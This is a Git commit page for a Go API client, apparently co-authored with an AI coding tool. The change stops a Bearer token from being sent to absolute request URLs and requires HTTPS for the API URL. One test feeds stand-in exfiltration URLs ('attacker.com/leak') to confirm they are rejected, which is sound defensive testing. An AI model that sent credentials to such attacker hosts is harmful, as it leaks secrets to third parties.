fix(mcp/brain/client): block absolute-URL bypass + apiURL scheme allowlist (MEDIUM)
requestURL() now returns (string, error) and rejects absolute or host-bearing URLs BEFORE request construction and BEFORE Authorization header is set. Closes the bearer-key leak vector: a path that ever flows from upstream JSON, config, or a tool argument can no longer spray the Bearer token at attacker-chosen URLs. New() validates apiURL at construction: - https://* always accepted - http://* rejected unless CORE_BRAIN_INSECURE=true is set (explicit dev/test opt-in; production should always be TLS) Cerberus #1052 from workspace-wide sniff. Today's call sites (Remember, Recall, Forget, List) hardcode the path → safe; this closes the API shape that invited future Call(ctx, method, untrustedPath, body) patterns from leaking the bearer. Tests: absolute http:// + https:// paths make zero HTTP calls, good relative path construction works, http:// apiURL rejected by default + accepted with CORE_BRAIN_INSECURE=true. Existing test fixtures converted to TLS to match the new default policy. Co-authored-by: Codex <noreply@openai.com> Closes tasks.lthn.sh/view.php?id=1052
This commit is contained in:
parent
e73deea84b
commit
cdb4bdbc45
2 changed files with 129 additions and 17 deletions
|
|
@ -28,6 +28,7 @@ import (
|
|||
|
||||
const (
|
||||
DefaultURL = "https://api.lthn.sh"
|
||||
insecureBrainEnv = "CORE_BRAIN_INSECURE"
|
||||
brainKeyFileMode = fs.FileMode(0o600)
|
||||
defaultAgentID = "cladius"
|
||||
defaultTimeout = 30 * time.Second
|
||||
|
|
@ -147,6 +148,7 @@ func New(options Options) *Client {
|
|||
if apiURL == "" {
|
||||
apiURL = DefaultURL
|
||||
}
|
||||
configErr := validateAPIURL(apiURL)
|
||||
agentID := core.Trim(options.AgentID)
|
||||
if agentID == "" {
|
||||
agentID = defaultAgentID
|
||||
|
|
@ -182,6 +184,7 @@ func New(options Options) *Client {
|
|||
baseDelay: baseDelay,
|
||||
maxResponseBytes: maxResponseBytes,
|
||||
circuitBreaker: breaker,
|
||||
configErr: configErr,
|
||||
sleepFunc: sleepDuration,
|
||||
}
|
||||
}
|
||||
|
|
@ -195,10 +198,26 @@ func NewFromEnvironment() *Client {
|
|||
Org: core.Env("CORE_BRAIN_ORG"),
|
||||
AgentID: core.Env("CORE_BRAIN_AGENT_ID"),
|
||||
})
|
||||
client.configErr = configErr
|
||||
if configErr != nil {
|
||||
client.configErr = configErr
|
||||
}
|
||||
return client
|
||||
}
|
||||
|
||||
func validateAPIURL(apiURL string) error {
|
||||
parsed, err := url.Parse(apiURL)
|
||||
if err != nil || parsed.Scheme == "" || parsed.Host == "" {
|
||||
return core.E("brain.client", "invalid API URL", err)
|
||||
}
|
||||
if parsed.Scheme == "https" {
|
||||
return nil
|
||||
}
|
||||
if parsed.Scheme == "http" && core.Trim(core.Env(insecureBrainEnv)) == "true" {
|
||||
return nil
|
||||
}
|
||||
return core.E("brain.client", "API URL must use https unless CORE_BRAIN_INSECURE=true", nil)
|
||||
}
|
||||
|
||||
// WriteBrainKey stores the OpenBrain API key at ~/.claude/brain.key with owner-only permissions.
|
||||
func WriteBrainKey(apiKey string) error {
|
||||
home := core.Env("HOME")
|
||||
|
|
@ -339,7 +358,11 @@ func (c *Client) doOnce(ctx context.Context, method, path, bodyString string, ha
|
|||
if hasBody {
|
||||
reader = core.NewReader(bodyString)
|
||||
}
|
||||
request, err := http.NewRequestWithContext(ctx, method, c.requestURL(path), reader)
|
||||
requestURL, err := c.requestURL(path)
|
||||
if err != nil {
|
||||
return nil, false, 0, false, err
|
||||
}
|
||||
request, err := http.NewRequestWithContext(ctx, method, requestURL, reader)
|
||||
if err != nil {
|
||||
return nil, false, 0, false, core.E("brain.client", "create request", err)
|
||||
}
|
||||
|
|
@ -385,14 +408,15 @@ func (c *Client) doOnce(ctx context.Context, method, path, bodyString string, ha
|
|||
return result, false, 0, false, nil
|
||||
}
|
||||
|
||||
func (c *Client) requestURL(path string) string {
|
||||
if core.HasPrefix(path, "http://") || core.HasPrefix(path, "https://") {
|
||||
return path
|
||||
func (c *Client) requestURL(path string) (string, error) {
|
||||
parsed, err := url.Parse(path)
|
||||
if err == nil && (parsed.IsAbs() || parsed.Host != "") {
|
||||
return "", core.E("brain.client", "absolute request URL rejected", nil)
|
||||
}
|
||||
if !core.HasPrefix(path, "/") {
|
||||
path = core.Concat("/", path)
|
||||
}
|
||||
return core.Concat(c.apiURL, path)
|
||||
return core.Concat(c.apiURL, path), nil
|
||||
}
|
||||
|
||||
func (c *Client) sleep(ctx context.Context, attempt int) error {
|
||||
|
|
|
|||
|
|
@ -18,7 +18,7 @@ import (
|
|||
func TestClientRemember_Good_SendsOrgAndAuth(t *testing.T) {
|
||||
var gotBody map[string]any
|
||||
|
||||
server := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
server := httptest.NewTLSServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
if r.Method != http.MethodPost {
|
||||
t.Fatalf("expected POST, got %s", r.Method)
|
||||
}
|
||||
|
|
@ -64,7 +64,7 @@ func TestClientRemember_Good_SendsOrgAndAuth(t *testing.T) {
|
|||
}
|
||||
|
||||
func TestClientList_Good_SendsOrgURLParam(t *testing.T) {
|
||||
server := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
server := httptest.NewTLSServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
if r.Method != http.MethodGet {
|
||||
t.Fatalf("expected GET, got %s", r.Method)
|
||||
}
|
||||
|
|
@ -90,9 +90,91 @@ func TestClientList_Good_SendsOrgURLParam(t *testing.T) {
|
|||
}
|
||||
}
|
||||
|
||||
func TestClientCall_Good_BuildsRequestAgainstAPIURL(t *testing.T) {
|
||||
gotHost := ""
|
||||
server := httptest.NewTLSServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
if r.Method != http.MethodPost {
|
||||
t.Fatalf("expected POST, got %s", r.Method)
|
||||
}
|
||||
if r.URL.Path != "/v1/brain/remember" {
|
||||
t.Fatalf("expected /v1/brain/remember, got %s", r.URL.Path)
|
||||
}
|
||||
gotHost = r.Host
|
||||
writeJSON(t, w, http.StatusOK, map[string]any{"id": "mem-1"})
|
||||
}))
|
||||
defer server.Close()
|
||||
|
||||
c := New(Options{
|
||||
URL: server.URL,
|
||||
Key: "test-key",
|
||||
HTTPClient: server.Client(),
|
||||
MaxAttempts: 1,
|
||||
})
|
||||
|
||||
result, err := c.Call(context.Background(), http.MethodPost, "/v1/brain/remember", map[string]any{"content": "safe"})
|
||||
if err != nil {
|
||||
t.Fatalf("Call failed: %v", err)
|
||||
}
|
||||
if result["id"] != "mem-1" {
|
||||
t.Fatalf("expected id mem-1, got %v", result["id"])
|
||||
}
|
||||
if gotHost != strings.TrimPrefix(server.URL, "https://") {
|
||||
t.Fatalf("expected host %s, got %s", strings.TrimPrefix(server.URL, "https://"), gotHost)
|
||||
}
|
||||
}
|
||||
|
||||
func TestClientCall_Bad_RejectsAbsoluteRequestURL(t *testing.T) {
|
||||
for _, requestPath := range []string{"http://attacker.com/leak", "https://attacker.com/leak"} {
|
||||
t.Run(requestPath, func(t *testing.T) {
|
||||
calls := 0
|
||||
c := New(Options{
|
||||
URL: "https://brain.test",
|
||||
Key: "test-key",
|
||||
HTTPClient: &http.Client{Transport: roundTripFunc(func(*http.Request) (*http.Response, error) {
|
||||
calls++
|
||||
return nil, core.E("test", "unexpected HTTP request", nil)
|
||||
})},
|
||||
MaxAttempts: 1,
|
||||
})
|
||||
|
||||
_, err := c.Call(context.Background(), http.MethodPost, requestPath, map[string]any{"content": "leak"})
|
||||
if err == nil {
|
||||
t.Fatal("expected absolute URL error")
|
||||
}
|
||||
if !strings.Contains(err.Error(), "absolute request URL rejected") {
|
||||
t.Fatalf("expected absolute URL rejection, got %v", err)
|
||||
}
|
||||
if calls != 0 {
|
||||
t.Fatalf("expected no HTTP requests, got %d", calls)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestClientNew_Bad_RejectsHTTPAPIURLWithoutInsecureEnv(t *testing.T) {
|
||||
t.Setenv(insecureBrainEnv, "")
|
||||
|
||||
c := New(Options{URL: "http://internal/", Key: "test-key"})
|
||||
if c.configErr == nil {
|
||||
t.Fatal("expected insecure HTTP API URL to be rejected")
|
||||
}
|
||||
if !strings.Contains(c.configErr.Error(), "API URL must use https unless CORE_BRAIN_INSECURE=true") {
|
||||
t.Fatalf("expected insecure API URL error, got %v", c.configErr)
|
||||
}
|
||||
}
|
||||
|
||||
func TestClientNew_Good_AllowsHTTPAPIURLWithInsecureEnv(t *testing.T) {
|
||||
t.Setenv(insecureBrainEnv, "true")
|
||||
|
||||
c := New(Options{URL: "http://internal/", Key: "test-key"})
|
||||
if c.configErr != nil {
|
||||
t.Fatalf("expected insecure HTTP API URL to be allowed, got %v", c.configErr)
|
||||
}
|
||||
}
|
||||
|
||||
func TestClientCall_Good_Retries503ThenSucceeds(t *testing.T) {
|
||||
attempts := 0
|
||||
server := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
server := httptest.NewTLSServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
attempts++
|
||||
if attempts == 1 {
|
||||
writeJSON(t, w, http.StatusServiceUnavailable, map[string]any{"error": "down"})
|
||||
|
|
@ -119,7 +201,7 @@ func TestClientCall_Good_Retries503ThenSucceeds(t *testing.T) {
|
|||
|
||||
func TestClientCall_Good_Retries408ThenSucceeds(t *testing.T) {
|
||||
attempts := 0
|
||||
server := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
server := httptest.NewTLSServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
attempts++
|
||||
if attempts == 1 {
|
||||
writeJSON(t, w, http.StatusRequestTimeout, map[string]any{"error": "timeout"})
|
||||
|
|
@ -146,7 +228,7 @@ func TestClientCall_Good_Retries408ThenSucceeds(t *testing.T) {
|
|||
|
||||
func TestClientCall_Good_Retries429ThenSucceeds(t *testing.T) {
|
||||
attempts := 0
|
||||
server := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
server := httptest.NewTLSServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
attempts++
|
||||
if attempts == 1 {
|
||||
writeJSON(t, w, http.StatusTooManyRequests, map[string]any{"error": "rate limited"})
|
||||
|
|
@ -173,7 +255,7 @@ func TestClientCall_Good_Retries429ThenSucceeds(t *testing.T) {
|
|||
|
||||
func TestClientCall_Good_Retries429UsingRetryAfterSeconds(t *testing.T) {
|
||||
attempts := 0
|
||||
server := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
server := httptest.NewTLSServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
attempts++
|
||||
if attempts == 1 {
|
||||
w.Header().Set("Retry-After", "1")
|
||||
|
|
@ -213,7 +295,7 @@ func TestClientCall_Good_Retries429UsingRetryAfterSeconds(t *testing.T) {
|
|||
|
||||
func TestClientCall_Good_Retries429WithPastRetryAfterDateWithoutNegativeSleep(t *testing.T) {
|
||||
attempts := 0
|
||||
server := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
server := httptest.NewTLSServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
attempts++
|
||||
if attempts == 1 {
|
||||
w.Header().Set("Retry-After", "Wed, 21 Oct 2015 07:28:00 GMT")
|
||||
|
|
@ -253,7 +335,7 @@ func TestClientCall_Good_Retries429WithPastRetryAfterDateWithoutNegativeSleep(t
|
|||
|
||||
func TestClientCall_Good_CapsRetryAfterDelay(t *testing.T) {
|
||||
attempts := 0
|
||||
server := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
server := httptest.NewTLSServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
attempts++
|
||||
if attempts == 1 {
|
||||
w.Header().Set("Retry-After", "9999")
|
||||
|
|
@ -293,7 +375,7 @@ func TestClientCall_Good_CapsRetryAfterDelay(t *testing.T) {
|
|||
|
||||
func TestClientCall_Bad_DoesNotRetry400(t *testing.T) {
|
||||
attempts := 0
|
||||
server := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
server := httptest.NewTLSServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
attempts++
|
||||
writeJSON(t, w, http.StatusBadRequest, map[string]any{"error": "bad request"})
|
||||
}))
|
||||
|
|
@ -316,7 +398,7 @@ func TestClientCall_Bad_DoesNotRetry400(t *testing.T) {
|
|||
|
||||
func TestClientCall_Bad_Continuous503OpensCircuit(t *testing.T) {
|
||||
attempts := 0
|
||||
server := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
server := httptest.NewTLSServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
attempts++
|
||||
writeJSON(t, w, http.StatusServiceUnavailable, map[string]any{"error": "down"})
|
||||
}))
|
||||
|
|
@ -352,7 +434,7 @@ func TestClientCall_Bad_Continuous503OpensCircuit(t *testing.T) {
|
|||
|
||||
func TestClientCall_Bad_ContextCancellation(t *testing.T) {
|
||||
attempts := 0
|
||||
server := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
server := httptest.NewTLSServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
attempts++
|
||||
writeJSON(t, w, http.StatusOK, map[string]any{"ok": true})
|
||||
}))
|
||||
|
|
@ -446,3 +528,9 @@ func writeJSON(t *testing.T, w http.ResponseWriter, status int, payload any) {
|
|||
t.Fatalf("failed to write response: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
type roundTripFunc func(*http.Request) (*http.Response, error)
|
||||
|
||||
func (fn roundTripFunc) RoundTrip(request *http.Request) (*http.Response, error) {
|
||||
return fn(request)
|
||||
}
|
||||
|
|
|
|||
Loading…
Add table
Reference in a new issue